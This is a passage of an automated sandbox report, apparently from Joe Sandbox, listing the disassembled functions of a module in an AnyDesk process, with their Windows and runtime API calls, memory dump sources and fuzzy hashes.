                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,69C497B5,00000000,?,?,?,?,?,?,?,?,?,69C497B5,?), ref: 69C4915D
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,69C497B5,00000000,?,?,?,?,?,?,?,?,?,69C497B5,?), ref: 69C49196
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                                  • Opcode ID: 2d6ed89d5ed36f3526697052d18092fe9b23a46de53c633a2160b3411bf30de4
                                                                                                                                                                                                                                                  • Instruction ID: b946b100b0677b4ea3fc3f26c25a8fa2b84d0c874464d6033297481f9cb2c565
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d6ed89d5ed36f3526697052d18092fe9b23a46de53c633a2160b3411bf30de4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C751E575E002599FDF00CFA8D945AEEBBF8FF49B10F10411AE955E7291E730AA41CB61
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: false$null$true
                                                                                                                                                                                                                                                  • API String ID: 0-2913297407
                                                                                                                                                                                                                                                  • Opcode ID: a6489fcf39540489a4fb520f7f300ca0056f60a4cd6b0dfb3c318ea86b050e82
                                                                                                                                                                                                                                                  • Instruction ID: 084b49dffa0c13df5e702cc2b103e7bf8b233e43442227a9b56ec9dec1476a51
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6489fcf39540489a4fb520f7f300ca0056f60a4cd6b0dfb3c318ea86b050e82
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C51E2799047499FD710CF78E441BAABBF5FF45304F0086AAC8999B602F731A64ACF51
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002,?), ref: 69C60349
                                                                                                                                                                                                                                                  • CoUninitialize.OLE32(00000001,00000000,?,00000000), ref: 69C6038E
                                                                                                                                                                                                                                                  • LaunchGoogleChrome.GCAPI(00000001,00000000,?,00000000), ref: 69C60381
                                                                                                                                                                                                                                                    • Part of subcall function 69C5FFEC: CoInitializeEx.OLE32(00000000,00000002), ref: 69C60024
                                                                                                                                                                                                                                                    • Part of subcall function 69C5FFEC: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000002,00000000,00000040,00000000), ref: 69C60039
                                                                                                                                                                                                                                                    • Part of subcall function 69C5FFEC: GetCurrentProcessId.KERNEL32(?), ref: 69C60064
                                                                                                                                                                                                                                                    • Part of subcall function 69C5FFEC: GetShellWindow.USER32 ref: 69C60087
                                                                                                                                                                                                                                                    • Part of subcall function 69C5FFEC: GetWindowThreadProcessId.USER32(00000000), ref: 69C6008E
                                                                                                                                                                                                                                                    • Part of subcall function 69C5FFEC: LocalFree.KERNEL32(?), ref: 69C600A2
                                                                                                                                                                                                                                                    • Part of subcall function 69C5FFEC: CoUninitialize.OLE32 ref: 69C602D1
                                                                                                                                                                                                                                                  • CoUninitialize.OLE32(00000001,00000000,?,00000000), ref: 69C603AF
                                                                                                                                                                                                                                                  • LaunchGoogleChrome.GCAPI ref: 69C603C9
                                                                                                                                                                                                                                                  • EnumWindows.USER32(69C5F056,?), ref: 69C6044C
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 69C6046A
                                                                                                                                                                                                                                                    • Part of subcall function 69C288E0: new.LIBCMT ref: 69C28900
                                                                                                                                                                                                                                                    • Part of subcall function 69C288E0: new.LIBCMT ref: 69C2893C
                                                                                                                                                                                                                                                    • Part of subcall function 69C288E0: new.LIBCMT ref: 69C28979
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeUninitialize$ChromeGoogleLaunchProcessWindow$CurrentEnumFreeLocalSecurityShellSleepThreadWindows
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1477501081-0
                                                                                                                                                                                                                                                  • Opcode ID: 28b74b9a289c749cb37e95cf3d47b9633d27fd90ae2a72c6f552fc9c2e475b42
                                                                                                                                                                                                                                                  • Instruction ID: 4845401c43c0e034f4de401853a0cc029cf4a4625bf8e1948ce021a16bf58474
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28b74b9a289c749cb37e95cf3d47b9633d27fd90ae2a72c6f552fc9c2e475b42
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C51BF35D012589FCB00CFA5F991BEDBBB8BF05324F10412AE921B71A1FBB05909CB61
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%,00000000,00000000,00000000,?,?,?,?,?,?,?,69C67616,?,69C6FB90,000000FF,69C78A68), ref: 69C6769E
                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%,00000000,00000000,?,?,?,?,?,69C67616,?,69C6FB90,000000FF,69C78A68,00000000,Software\Google\Update\ClientState), ref: 69C676C8
                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000000,00000000,?,?,?,?,?,69C67616,?,69C6FB90,000000FF,69C78A68,00000000,Software\Google\Update\ClientState), ref: 69C676E9
                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000001,00000000,?,?,?,?,?,69C67616,?,69C6FB90,000000FF,69C78A68,00000000,Software\Google\Update\ClientState), ref: 69C67718
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: EnvironmentExpandPathStringsTemp
                                                                                                                                                                                                                                                  • String ID: %LOCALAPPDATA%$User Data
                                                                                                                                                                                                                                                  • API String ID: 442586119-612141592
                                                                                                                                                                                                                                                  • Opcode ID: ebd49cc4cbeeb24c22015eafb82e9aa879f58a7ae5f2627a67df2b1a18d8ed12
                                                                                                                                                                                                                                                  • Instruction ID: ae01698d984d3ba3de1908d78b05b3d7a12cb5cb1201bea7c0f09ad3e8eef8dd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ebd49cc4cbeeb24c22015eafb82e9aa879f58a7ae5f2627a67df2b1a18d8ed12
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 003142357002106BDB149A38BDE9E7F77ACEF82B64B10952EE806DB190FF20DC0182B0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(?,?,?,00000000,00000000,?,69C5EF48,?,?,00000208), ref: 69C5F1D9
                                                                                                                                                                                                                                                  • GetFileVersionInfoW.VERSION(?,?,00002000,?,?,?,00000208), ref: 69C5F217
                                                                                                                                                                                                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,00002000,?,?,?,00000208), ref: 69C5F24A
                                                                                                                                                                                                                                                  • VerQueryValueW.VERSION(?,?,?,?,\VarFileInfo\Translation,?,?,?,?,00002000,?,?,?,00000208), ref: 69C5F2C1
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • \VarFileInfo\Translation, xrefs: 69C5F23E
                                                                                                                                                                                                                                                  • \StringFileInfo\%02X%02X%02X%02X\CompanyName, xrefs: 69C5F286
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileInfoQueryValueVersion$Size
                                                                                                                                                                                                                                                  • String ID: \StringFileInfo\%02X%02X%02X%02X\CompanyName$\VarFileInfo\Translation
                                                                                                                                                                                                                                                  • API String ID: 2099394744-937506062
                                                                                                                                                                                                                                                  • Opcode ID: 1da150b9443c94917f10a65aceffcfed5bc4f0d6300ae5d83629c84da95cbbbb
                                                                                                                                                                                                                                                  • Instruction ID: e650abd6ee291f6126e56e65f2ec9c6e3788387ac67083bea4a9679ec3b0b997
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1da150b9443c94917f10a65aceffcfed5bc4f0d6300ae5d83629c84da95cbbbb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA3186F9A002286BEB24DA55EC41EDF77FCAB44200FD045D6FA25D3142EA309A64DB68
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(00000000,00000000,?,?,?,?,?,?,69C7B5AC,19930522,00000000,1FFFFFFF), ref: 69C4334E
                                                                                                                                                                                                                                                  • _CallSETranslator.LIBVCRUNTIME ref: 69C43381
                                                                                                                                                                                                                                                  • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 69C433AA
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CallCheckEncodePointerRangeTranslatorTrys
                                                                                                                                                                                                                                                  • String ID: MOC$RCC$U"
                                                                                                                                                                                                                                                  • API String ID: 877623402-3732758283
                                                                                                                                                                                                                                                  • Opcode ID: e67bbc61ef93d82a854acc5daf3d24b6e12e797a9617a8a47d3ccae3ae15dedc
                                                                                                                                                                                                                                                  • Instruction ID: 66d05c86cfe2e0c1addd58ecb57f3ac9479bc6a79e63127256afd1bbad1f08db
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e67bbc61ef93d82a854acc5daf3d24b6e12e797a9617a8a47d3ccae3ae15dedc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE416B32600149EFDF02CF40D981EAEBB76FF88B14F259548E91467251E775ED51CBA0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?), ref: 69C64149
                                                                                                                                                                                                                                                  • LockFileEx.KERNEL32(00000000,00000002,00000000,000000FF,000000FF,?), ref: 69C6417F
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C64198
                                                                                                                                                                                                                                                  • new.LIBCMT ref: 69C641D9
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc, xrefs: 69C641A5
                                                                                                                                                                                                                                                  • LockFileEx, xrefs: 69C641B8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$CreateErrorLastLock
                                                                                                                                                                                                                                                  • String ID: LockFileEx$c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc
                                                                                                                                                                                                                                                  • API String ID: 3875127904-1259685872
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Getcvt
                                                                                                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                                                                                                  • API String ID: 1921796781-2658103896
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 69C273EE
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 69C2740A
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 69C2742A
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 69C27471
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 69C274AD
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 69C274B8
                                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 69C274C6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register_abort
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 954195503-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 69C3E58E
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 69C3E5AA
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 69C3E5CA
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 69C3E611
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 69C3E64D
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 69C3E658
                                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 69C3E666
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register_abort
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 954195503-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 69C274EE
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 69C2750A
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 69C2752A
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 69C27571
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 69C275AD
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 69C275B8
                                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 69C275C6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register_abort
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 954195503-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C59FF2: _free.LIBCMT ref: 69C5A01B
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C5A2F9
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: HeapFree.KERNEL32(00000000,00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000), ref: 69C4CBBB
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: GetLastError.KERNEL32(00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000,00000000), ref: 69C4CBCD
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C5A304
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C5A30F
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C5A363
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C5A36E
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C5A379
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C5A384
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000001,?,69C4548D,69C40D47,69C4093D,?,69C40B4D,?,00000001,?,?,00000001,?,69C7B430,0000000C,69C40C56), ref: 69C455B4
                                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 69C455C2
                                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 69C455DB
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,69C40B4D,?,00000001,?,?,00000001,?,69C7B430,0000000C,69C40C56,?,00000001,?), ref: 69C4562D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
